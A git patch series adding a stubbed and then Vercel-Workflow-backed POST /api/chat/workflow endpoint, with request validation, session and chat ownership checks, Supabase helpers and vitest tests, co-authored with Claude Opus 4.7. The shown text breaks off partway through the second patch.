From d20ac4e48895e45bac06dd93195513c9ef7da999 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 09:24:00 -0500 Subject: [PATCH 01/10] feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub- header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f650) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/api/chat/workflow/route.ts | 34 ++++ .../handleChatWorkflowStream.test.ts | 165 ++++++++++++++++++ .../__tests__/validateChatWorkflow.test.ts | 142 +++++++++++++++ lib/chat/handleChatWorkflowStream.ts | 61 +++++++ lib/chat/validateChatWorkflow.ts | 61 +++++++ 5 files changed, 463 insertions(+) create mode 100644 app/api/chat/workflow/route.ts create mode 100644 lib/chat/__tests__/handleChatWorkflowStream.test.ts create mode 100644 lib/chat/__tests__/validateChatWorkflow.test.ts create mode 100644 lib/chat/handleChatWorkflowStream.ts create mode 100644 lib/chat/validateChatWorkflow.ts diff --git a/app/api/chat/workflow/route.ts b/app/api/chat/workflow/route.ts new file mode 100644 index 000000000..19445c03b --- /dev/null +++ b/app/api/chat/workflow/route.ts @@ -0,0 +1,34 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; + +export const maxDuration = 800; + +/** + * OPTIONS handler for CORS preflight requests. + * + * @returns A NextResponse with CORS headers. + */ +export async function OPTIONS() { + return new NextResponse(null, { + status: 200, + headers: getCorsHeaders(), + }); +} + +/** + * POST /api/chat/workflow + * + * Streams a sandbox-driven agent loop (Vercel Workflow) for an existing + * session + chat. Currently returns a hardcoded UIMessage stream stub — + * the workflow is wired up in a follow-up PR. + * + * Contract: https://developers.recoupable.com/api-reference/chat/workflow + * + * @param request - The incoming NextRequest. + * @returns A streaming Response (200) or a NextResponse error. + */ +export async function POST(request: NextRequest): Promise { + return handleChatWorkflowStream(request); +} diff --git a/lib/chat/__tests__/handleChatWorkflowStream.test.ts b/lib/chat/__tests__/handleChatWorkflowStream.test.ts new file mode 100644 index 000000000..c61911be8 --- /dev/null +++ b/lib/chat/__tests__/handleChatWorkflowStream.test.ts @@ -0,0 +1,165 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { handleChatWorkflowStream } from "@/lib/chat/handleChatWorkflowStream"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; + +vi.mock("@/lib/chat/validateChatWorkflow", () => ({ + validateChatWorkflow: vi.fn(), +})); +vi.mock("@/lib/supabase/sessions/selectSessions", () => ({ + selectSessions: vi.fn(), +})); +vi.mock("@/lib/supabase/chats/selectChats", () => ({ + selectChats: vi.fn(), +})); +vi.mock("@/lib/sandbox/isSandboxActive", () => ({ + isSandboxActive: vi.fn(), +})); +vi.mock("@/lib/networking/getCorsHeaders", () => ({ + getCorsHeaders: vi.fn(() => ({ "Access-Control-Allow-Origin": "*" })), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const OTHER_ACCOUNT_ID = "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; + +function makeRequest(): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "test-key", "content-type": "application/json" }, + body: JSON.stringify({ messages: [], chatId: CHAT_ID, sessionId: SESSION_ID }), + }); +} + +function mockValidatedRequest(overrides: Partial<{ accountId: string }> = {}) { + vi.mocked(validateChatWorkflow).mockResolvedValue({ + messages: [], + chatId: CHAT_ID, + sessionId: SESSION_ID, + accountId: overrides.accountId ?? ACCOUNT_ID, + orgId: null, + authToken: "test-key", + }); +} + +function mockOwnedSessionWithActiveSandbox() { + mockValidatedRequest(); + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(selectChats).mockResolvedValue([{ id: CHAT_ID, session_id: SESSION_ID } as never]); + vi.mocked(isSandboxActive).mockReturnValue(true); +} + +describe("handleChatWorkflowStream (stub)", () => { + beforeEach(() => { + vi.clearAllMocks(); + }); + + describe("validation short-circuits", () => { + it("returns the validator's short-circuit response unchanged (e.g. 401)", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(authError); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(401); + }); + + it("returns the validator's 400 unchanged (e.g. invalid body)", async () => { + const badBody = NextResponse.json( + { status: "error", error: "Invalid JSON body" }, + { status: 400 }, + ); + vi.mocked(validateChatWorkflow).mockResolvedValue(badBody); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + }); + }); + + describe("session / chat ownership", () => { + beforeEach(() => mockValidatedRequest()); + + it("returns 404 when the session does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + + it("returns 500 when selectSessions errors (returns null)", async () => { + vi.mocked(selectSessions).mockResolvedValue(null); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(500); + }); + + it("returns 403 when the session is owned by a different account", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: OTHER_ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(403); + }); + + it("returns 400 'Sandbox not initialized' when sandbox is inactive", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: null } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(false); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(400); + const body = await res.json(); + expect(body.error).toMatch(/sandbox/i); + }); + + it("returns 404 when the chat does not exist", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + + it("returns 404 when chat exists but belongs to a different session", async () => { + vi.mocked(selectSessions).mockResolvedValue([ + { id: SESSION_ID, account_id: ACCOUNT_ID, sandbox_state: { ready: true } } as never, + ]); + vi.mocked(isSandboxActive).mockReturnValue(true); + vi.mocked(selectChats).mockResolvedValue([ + { id: CHAT_ID, session_id: "different-session" } as never, + ]); + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(404); + }); + }); + + describe("success (stub response)", () => { + beforeEach(() => mockOwnedSessionWithActiveSandbox()); + + it("returns 200 with text/event-stream content type", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + expect(res.status).toBe(200); + expect(res.headers.get("content-type") ?? "").toMatch(/text\/event-stream/); + }); + + it("sets an x-workflow-run-id response header starting with stub-", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const runId = res.headers.get("x-workflow-run-id"); + expect(runId).toBeTruthy(); + expect(runId!.startsWith("stub-")).toBe(true); + }); + + it("emits a stream body that includes the stub assistant text", async () => { + const res = await handleChatWorkflowStream(makeRequest()); + const text = await res.text(); + expect(text).toContain("Hello from /api/chat/workflow"); + }); + }); +}); diff --git a/lib/chat/__tests__/validateChatWorkflow.test.ts b/lib/chat/__tests__/validateChatWorkflow.test.ts new file mode 100644 index 000000000..8eb9457c2 --- /dev/null +++ b/lib/chat/__tests__/validateChatWorkflow.test.ts @@ -0,0 +1,142 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { NextRequest, NextResponse } from "next/server"; + +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { validateAuthContext } from "@/lib/auth/validateAuthContext"; + +vi.mock("@/lib/auth/validateAuthContext", () => ({ + validateAuthContext: vi.fn(), +})); + +const ACCOUNT_ID = "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa"; +const CHAT_ID = "11111111-1111-1111-1111-111111111111"; +const SESSION_ID = "22222222-2222-2222-2222-222222222222"; + +const validBody = { + messages: [{ id: "m-1", role: "user", parts: [{ type: "text", text: "hi" }] }], + chatId: CHAT_ID, + sessionId: SESSION_ID, +}; + +function makeRequest(body: unknown = validBody): NextRequest { + return new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: typeof body === "string" ? body : JSON.stringify(body), + }); +} + +function mockAuthOk() { + vi.mocked(validateAuthContext).mockResolvedValue({ + accountId: ACCOUNT_ID, + orgId: null, + authToken: "k", + }); +} + +describe("validateChatWorkflow", () => { + beforeEach(() => vi.clearAllMocks()); + + describe("valid input", () => { + beforeEach(() => mockAuthOk()); + + it("returns the validated body augmented with accountId / orgId / authToken", async () => { + const result = await validateChatWorkflow(makeRequest()); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.chatId).toBe(CHAT_ID); + expect(result.sessionId).toBe(SESSION_ID); + expect(result.messages).toEqual(validBody.messages); + expect(result.accountId).toBe(ACCOUNT_ID); + expect(result.orgId).toBe(null); + expect(result.authToken).toBe("k"); + }); + + it("accepts an optional context.contextLimit integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: 50 } }), + ); + expect(result).not.toBeInstanceOf(NextResponse); + if (result instanceof NextResponse) return; + expect(result.context?.contextLimit).toBe(50); + }); + + it("accepts an empty messages array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: [] })); + expect(result).not.toBeInstanceOf(NextResponse); + }); + }); + + describe("invalid body", () => { + it("returns 400 when JSON is malformed", async () => { + const req = new NextRequest("http://localhost/api/chat/workflow", { + method: "POST", + headers: { "x-api-key": "k", "content-type": "application/json" }, + body: "{not-json", + }); + const result = await validateChatWorkflow(req); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is missing", async () => { + const { chatId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when sessionId is missing", async () => { + const { sessionId: _omit, ...rest } = validBody; + const result = await validateChatWorkflow(makeRequest(rest)); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when messages is not an array", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, messages: "nope" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when chatId is empty string", async () => { + const result = await validateChatWorkflow(makeRequest({ ...validBody, chatId: "" })); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("returns 400 when context.contextLimit is not an integer", async () => { + const result = await validateChatWorkflow( + makeRequest({ ...validBody, context: { contextLimit: "fifty" } }), + ); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(400); + }); + + it("does not call validateAuthContext when body validation fails", async () => { + const { chatId: _omit, ...rest } = validBody; + await validateChatWorkflow(makeRequest(rest)); + expect(validateAuthContext).not.toHaveBeenCalled(); + }); + }); + + describe("auth", () => { + it("returns the auth short-circuit response when validateAuthContext rejects", async () => { + const authError = NextResponse.json( + { status: "error", error: "Unauthorized" }, + { status: 401 }, + ); + vi.mocked(validateAuthContext).mockResolvedValue(authError); + const result = await validateChatWorkflow(makeRequest()); + expect(result).toBeInstanceOf(NextResponse); + if (!(result instanceof NextResponse)) return; + expect(result.status).toBe(401); + }); + }); +}); diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts new file mode 100644 index 000000000..137f699cb --- /dev/null +++ b/lib/chat/handleChatWorkflowStream.ts @@ -0,0 +1,61 @@ +import { NextRequest, NextResponse } from "next/server"; +import { createUIMessageStream, createUIMessageStreamResponse } from "ai"; +import { validateChatWorkflow } from "@/lib/chat/validateChatWorkflow"; +import { selectSessions } from "@/lib/supabase/sessions/selectSessions"; +import { selectChats } from "@/lib/supabase/chats/selectChats"; +import { isSandboxActive } from "@/lib/sandbox/isSandboxActive"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { getCorsHeaders } from "@/lib/networking/getCorsHeaders"; +import generateUUID from "@/lib/uuid/generateUUID"; + +/** + * Handles POST /api/chat/workflow. + * + * Stub implementation: delegates auth + body validation to validateChatWorkflow, + * verifies ownership of the referenced session + chat, confirms the session's + * sandbox is active, then returns a hardcoded UIMessage stream with an + * `x-workflow-run-id` header. The Vercel Workflow that will eventually drive + * the agent loop is wired up in a follow-up PR — this stub exists so clients + * can integrate against the contract documented at + * /api-reference/chat/workflow. + * + * @param request - The incoming NextRequest + * @returns A streaming Response (200) or a NextResponse error. + */ +export async function handleChatWorkflowStream(request: NextRequest): Promise { + const validated = await validateChatWorkflow(request); + if (validated instanceof NextResponse) return validated; + + const sessions = await selectSessions({ id: validated.sessionId }); + if (sessions === null) return errorResponse("Internal server error", 500); + const session = sessions[0]; + if (!session) return errorResponse("Session not found", 404); + if (session.account_id !== validated.accountId) return errorResponse("Forbidden", 403); + if (!isSandboxActive(session)) return errorResponse("Sandbox not initialized", 400); + + const chats = await selectChats({ id: validated.chatId }); + const chat = chats[0]; + if (!chat || chat.session_id !== validated.sessionId) { + return errorResponse("Chat not found", 404); + } + + const runId = `stub-${generateUUID()}`; + + const stream = createUIMessageStream({ + generateId: generateUUID, + execute: ({ writer }) => { + const id = generateUUID(); + writer.write({ type: "text-start", id }); + writer.write({ type: "text-delta", id, delta: "Hello from /api/chat/workflow" }); + writer.write({ type: "text-end", id }); + }, + }); + + return createUIMessageStreamResponse({ + stream, + headers: { + ...getCorsHeaders(), + "x-workflow-run-id": runId, + }, + }); +} diff --git a/lib/chat/validateChatWorkflow.ts b/lib/chat/validateChatWorkflow.ts new file mode 100644 index 000000000..4fd8e6c66 --- /dev/null +++ b/lib/chat/validateChatWorkflow.ts @@ -0,0 +1,61 @@ +import type { NextRequest } from "next/server"; +import { NextResponse } from "next/server"; +import { z } from "zod"; +import { validateAuthContext } from "@/lib/auth/validateAuthContext"; +import { errorResponse } from "@/lib/networking/errorResponse"; +import { validationErrorResponse } from "@/lib/zod/validationErrorResponse"; + +export const chatWorkflowBodySchema = z.object({ + messages: z.array(z.any()), + chatId: z.string().min(1, "chatId is required"), + sessionId: z.string().min(1, "sessionId is required"), + context: z + .object({ + contextLimit: z.number().int("contextLimit must be an integer"), + }) + .optional(), +}); + +export type ChatWorkflowBody = z.infer; + +export type ChatWorkflowRequest = ChatWorkflowBody & { + accountId: string; + orgId: string | null; + authToken?: string; +}; + +/** + * Validates a POST /api/chat/workflow request end-to-end: parses the JSON + * body, validates it against the schema, and runs auth via + * validateAuthContext. Returns a NextResponse error short-circuit (400/401/403) + * or the typed body augmented with the authenticated accountId / orgId / token. + * + * @param request - The incoming NextRequest. + * @returns A NextResponse error or the validated, auth-augmented request. + */ +export async function validateChatWorkflow( + request: NextRequest, +): Promise { + let rawBody: unknown; + try { + rawBody = await request.json(); + } catch { + return errorResponse("Invalid JSON body", 400); + } + + const parsed = chatWorkflowBodySchema.safeParse(rawBody); + if (!parsed.success) { + const firstError = parsed.error.issues[0]; + return validationErrorResponse(firstError.message, firstError.path); + } + + const auth = await validateAuthContext(request); + if (auth instanceof NextResponse) return auth; + + return { + ...parsed.data, + accountId: auth.accountId, + orgId: auth.orgId, + authToken: auth.authToken, + }; +} From f9efbea9e269bdb6980656e5e35e483b30705d66 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 12:07:35 -0500 Subject: [PATCH 02/10] feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-`) are replaced with real ones (`wrun_`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org--` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- app/lib/workflows/runAgentStep.ts | 55 ++++ app/lib/workflows/runAgentWorkflow.ts | 56 ++++ .../compareAndSetChatActiveStreamId.test.ts | 51 +++ .../handleChatWorkflowStream.test.ts | 301 ++++++++++++++---- .../__tests__/maybeResumeChatStream.test.ts | 46 +++ .../persistLatestUserMessage.test.ts | 129 ++++++++ .../reconcileExistingActiveStream.test.ts | 92 ++++++ lib/chat/agentCustomInstructions.ts | 9 + lib/chat/assistantFileLinks.ts | 28 ++ lib/chat/compareAndSetChatActiveStreamId.ts | 49 +++ lib/chat/handleChatWorkflowStream.ts | 100 ++++-- lib/chat/maybeResumeChatStream.ts | 40 +++ lib/chat/persistLatestUserMessage.ts | 84 +++++ lib/chat/reconcileExistingActiveStream.ts | 56 ++++ lib/chat/recoupApiSkillPrompt.ts | 11 + lib/recoupable/__tests__/extractOrgId.test.ts | 57 ++++ lib/recoupable/extractOrgId.ts | 31 ++ .../__tests__/selectChatMessages.test.ts | 58 ++++ .../__tests__/upsertChatMessage.test.ts | 46 +++ .../chat_messages/selectChatMessages.ts | 40 +++ .../chat_messages/upsertChatMessage.ts | 37 +++ .../chats/__tests__/updateChat.test.ts | 110 +++++++ lib/supabase/chats/updateChat.ts | 86 +++++ 23 files changed, 1478 insertions(+), 94 deletions(-) create mode 100644 app/lib/workflows/runAgentStep.ts create mode 100644 app/lib/workflows/runAgentWorkflow.ts create mode 100644 lib/chat/__tests__/compareAndSetChatActiveStreamId.test.ts create mode 100644 lib/chat/__tests__/maybeResumeChatStream.test.ts create mode 100644 lib/chat/__tests__/persistLatestUserMessage.test.ts create mode 100644 lib/chat/__tests__/reconcileExistingActiveStream.test.ts create mode 100644 lib/chat/agentCustomInstructions.ts create mode 100644 lib/chat/assistantFileLinks.ts create mode 100644 lib/chat/compareAndSetChatActiveStreamId.ts create mode 100644 lib/chat/maybeResumeChatStream.ts create mode 100644 lib/chat/persistLatestUserMessage.ts create mode 100644 lib/chat/reconcileExistingActiveStream.ts create mode 100644 lib/chat/recoupApiSkillPrompt.ts create mode 100644 lib/recoupable/__tests__/extractOrgId.test.ts create mode 100644 lib/recoupable/extractOrgId.ts create mode 100644 lib/supabase/chat_messages/__tests__/selectChatMessages.test.ts create mode 100644 lib/supabase/chat_messages/__tests__/upsertChatMessage.test.ts create mode 100644 lib/supabase/chat_messages/selectChatMessages.ts create mode 100644 lib/supabase/chat_messages/upsertChatMessage.ts create mode 100644 lib/supabase/chats/__tests__/updateChat.test.ts create mode 100644 lib/supabase/chats/updateChat.ts diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts new file mode 100644 index 000000000..352dcd265 --- /dev/null +++ b/app/lib/workflows/runAgentStep.ts @@ -0,0 +1,55 @@ +import { streamText, convertToModelMessages, type UIMessage, type UIMessageChunk } from "ai"; +import { gateway } from "@ai-sdk/gateway"; +import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions"; + +export type RunAgentStepInput = { + messages: UIMessage[]; + modelId: string; + writable: WritableStream; +}; + +/** + * One LLM turn in the chat workflow agent loop. Runs as a Vercel Workflow + * `"use step"` so that: + * + * - Sandbox-banned APIs (`fetch`, `setTimeout`, `crypto`) are legal inside. + * - The result is cached as a single durable event — replays after a crash + * do not re-bill the model. + * + * Currently emits a plain text response with no tools. Sandbox tools land in + * the follow-up PR (port `@open-harness/agent` tools + wire via + * `experimental_context`). + * + * @param input - Messages + selected model + the workflow's writable stream. + * @returns finishReason from the model run (for the workflow loop's break condition). + */ +export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishReason: string }> { + "use step"; + + console.log("[runAgentStep] start", { + modelId: input.modelId, + messageCount: input.messages.length, + }); + + const modelMessages = convertToModelMessages(input.messages); + const result = streamText({ + model: gateway(input.modelId), + system: agentCustomInstructions, + messages: modelMessages, + }); + + // Acquire the writer once and release in `finally` — re-acquiring per chunk + // (the previous shape) leaked the lock when any write threw. + const writer = input.writable.getWriter(); + try { + for await (const part of result.toUIMessageStream()) { + await writer.write(part); + } + } finally { + writer.releaseLock(); + } + + const finishReason = await result.finishReason; + console.log("[runAgentStep] finish", { finishReason }); + return { finishReason }; +} diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts new file mode 100644 index 000000000..db679145a --- /dev/null +++ b/app/lib/workflows/runAgentWorkflow.ts @@ -0,0 +1,56 @@ +import { getWritable } from "workflow"; +import type { UIMessage, UIMessageChunk } from "ai"; +import { runAgentStep } from "@/app/lib/workflows/runAgentStep"; + +export type RunAgentWorkflowInput = { + messages: UIMessage[]; + chatId: string; + sessionId: string; + modelId: string; +}; + +/** + * Vercel Workflow that drives the chat agent loop. The route handler calls + * `start(runAgentWorkflow, [...])` and pipes `run.getReadable()` back to the + * client; this function writes UIMessage chunks into the workflow's writable + * via 